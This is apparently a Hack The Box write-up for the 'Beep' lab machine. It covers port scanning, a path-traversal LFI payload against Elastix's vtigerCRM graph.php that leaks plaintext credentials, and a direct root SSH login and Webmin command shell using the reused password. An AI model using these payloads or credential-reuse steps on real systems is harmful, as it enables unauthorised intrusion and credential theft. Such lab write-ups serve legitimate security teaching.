HTB: Beep

HTB: Beep — Full Writeup

Beep runs Elastix — a Linux PBX system built on FreePBX and Asterisk. The most reliable path uses a Local File Inclusion vulnerability in vtigerCRM to leak credentials from the config file, then logs in directly as root via SSH — no privilege escalation needed.

Machine Info

• OS: Linux (CentOS)
• Difficulty: Easy
• IP: 10.10.10.7
• Key Vulnerability: Elastix 2.2.0 — LFI via vtigerCRM leading to credential disclosure

Step 1 — Enumeration

Start with a full Nmap scan to identify open ports and service versions:

nmap -sV -sC -p- --min-rate 5000 10.10.10.7

Key results from the scan:

• Port 22 — OpenSSH 4.3
• Port 25 — Postfix smtpd
• Port 80 — Apache httpd (redirects to 443)
• Port 110 — Cyrus pop3d
• Port 143 — Cyrus imapd
• Port 443 — HTTPS — Elastix login panel
• Port 993 / 995 — IMAPS / POP3S
• Port 3306 — MySQL
• Port 10000 — Webmin httpd

The most interesting services are the Elastix panel on port 443, Webmin on port 10000, and SSH on port 22. Multiple exploitation paths exist on this box.

Step 2 — Web Enumeration

Run a directory scan against the Elastix panel — use -k to skip SSL validation:

gobuster dir -u https://10.10.10.7 \
  -w /usr/share/wordlists/dirb/common.txt -k

Notable directories discovered:

• /admin — FreePBX administration panel
• /configs — configuration directory (403 Forbidden)
• /recordings — FreePBX call recordings interface
• /vtigercrm — vtiger CRM application

The /vtigercrm endpoint is the key finding — it contains a known Local File Inclusion vulnerability.

Step 3 — LFI via vtigerCRM

The graph.php file does not sanitise the current_language parameter. Use it to read /etc/amportal.conf via path traversal:

https://10.10.10.7/vtigercrm/graph.php
  ?current_language=../../../../../../../../etc/amportal.conf%00
  &module=Accounts&action

The response leaks the FreePBX configuration in plaintext:

AMPDBUSER=asteriskuser
AMPDBPASS=jEhdIekWmdjE
AMPMGRUSER=admin
AMPMGRPASS=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE

The password jEhdIekWmdjE is reused across every service. PBX systems are frequently misconfigured with root SSH access enabled — try it immediately against port 22.

Step 4 — SSH as Root

The old OpenSSH version requires legacy key exchange flags. Connect using:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 \
    -oHostKeyAlgorithms=+ssh-dss root@10.10.10.7

Enter jEhdIekWmdjE when prompted. Verify the session:

id
uid=0(root) gid=0(root) groups=0(root)

Direct root — no privilege escalation needed.

Step 5 — Flags

With a root shell, grab both flags:

# User flag
cat /home/fanis/user.txt

# Root flag
cat /root/root.txt

Bonus — Webmin Root Shell

Webmin on port 10000 accepts the same root:jEhdIekWmdjE credentials. Navigate to Others > Command Shell for a root shell with no exploit required — pure credential reuse:

https://10.10.10.7:10000
# Log in as root / jEhdIekWmdjE
# Others > Command Shell

This is a reliable alternate path if SSH key exchange negotiation fails on certain client versions.

Key Takeaways

• PBX systems expose large attack surfaces — enumerate every port
• LFI in bundled apps like vtigerCRM can leak plaintext credentials
• Password reuse across services is a critical misconfiguration
• Legacy SSH servers need -oKexAlgorithms flags to connect
• Always test recovered credentials against SSH as root
• Multiple paths exist — LFI + SSH, Webmin, and Metasploit all work

Tools Used

• nmap — port scanning and service enumeration
• gobuster — web directory enumeration
• browser / curl — LFI via vtigerCRM graph.php
• ssh — direct root login with recovered credentials
• Webmin — alternate root shell via command interface
• Metasploit — exploit/multi/http/elastix_graph_php_lfi
• netcat — reverse shell listener